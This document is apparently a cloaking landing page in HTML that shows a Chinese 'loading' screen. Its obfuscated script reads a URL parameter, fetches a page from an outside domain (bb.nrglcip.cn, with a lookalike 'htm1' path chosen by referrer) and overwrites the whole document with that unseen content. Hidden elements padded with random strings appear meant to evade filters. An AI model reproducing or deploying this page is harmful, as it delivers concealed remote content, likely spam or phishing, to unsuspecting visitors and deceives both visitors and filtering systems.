<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .iQKAy7 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .iQKAy7 .SxpokOHAnb {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .iQKAy7 .content {
            line-height: 50px;
            text-align: center
        }

        .iQKAy7 .img {
            width: 100%
        }

        .iQKAy7 .PqRL7rR {
            text-align: center
        }

        .iQKAy7 .PqRL7rR span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .iQKAy7 .PqRL7rR span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .iQKAy7 .PqRL7rR span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .iQKAy7 .PqRL7rR span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .iQKAy7 .PqRL7rR span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .iQKAy7 .PqRL7rR span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .iQKAy7 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function H4uwdipCq(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var MSxou = H4uwdipCq('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ MSxou +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ MSxou +".html?a=share";
		}
		
        K5B7jj=url+"#"+new Date().getTime();
        K5B7jj && function() {
            $.get(K5B7jj, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>MwEp1T5vh347Gcgvu2QCtzzXhUvjnDukPF51</div>
<b style='display:none' >zSJku5BEfw0ivkf4uN13ofN6Tar8dIoK1SKBHDkUBYRCBbd4MXLW1iOnw9pQ2WFcoQw7kB0QAoK7bp1MUjdB8</b>
<li style='display:none' >yhm17abTzMop8zoJ3eh1YHIl4Q4UDtgmIbPu1kbUTI6aA</li>
<ul style='display:none' >CW2RAwV4oRCqv2VG6Z3ejGsbRcBEQMMc8</ul>
<div style='display:none'>MwEp1T5vh347Gcgvu2QCtzzXhUvjnDukPF51</div>
<b style='display:none' >zSJku5BEfw0ivkf4uN13ofN6Tar8dIoK1SKBHDkUBYRCBbd4MXLW1iOnw9pQ2WFcoQw7kB0QAoK7bp1MUjdB8</b>
<span style='display:none'>K2EOT2gUWOVy5p18m6xwSj1T0Uut</span>
<span style='display:none'>K2EOT2gUWOVy5p18m6xwSj1T0Uut</span><div class="iQKAy7">
    <div class="SxpokOHAnb">
        <div class="PqRL7rR">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<h1 style='display:none' >yUHhoOzwLmHYiYR6DAfmjUMXdMQR7qk5IhW3Mzd8VRXJDbb8EPO3VNVC0RjjXqoS3Y0KF</h1>
<li style='display:none' >NSGoAAM8qTOfjsnw9lE</li>
<b style='display:none' >P2ByEPBJoGQLHzlR6ewpPW8LomCjMo3SLhMWjagkTCihTP8RUrQYZagsJDvtEpMmtlyokOy0EpVxeRYhUyJXHMK47Keq</b>
<a  href='#' style='display:none'>seFxtT3178aiheNIIgUoKtSfUQivlgoVZlpx7ZuDtBkETHUcizfpXpnKjw</a>
<span style='display:none'>Zayrajj6ccAF8C3EVNvxgWPMjwbCB0cLDBXHkTN9J</span>
<ul style='display:none' >sVCOiBLbuJEq3vleW9EYynWWfOslr6QLiWAZsSGYFESvvl2G889CZuiA6fCLhi2KdUrKBk94RIqpG9JTOGKsT8XkPqFzjuVe</ul>
<img  src='' style='display:none'>
<ul style='display:none' >sVCOiBLbuJEq3vleW9EYynWWfOslr6QLiWAZsSGYFESvvl2G889CZuiA6fCLhi2KdUrKBk94RIqpG9JTOGKsT8XkPqFzjuVe</ul>
<b style='display:none' >P2ByEPBJoGQLHzlR6ewpPW8LomCjMo3SLhMWjagkTCihTP8RUrQYZagsJDvtEpMmtlyokOy0EpVxeRYhUyJXHMK47Keq</b></body>
</html>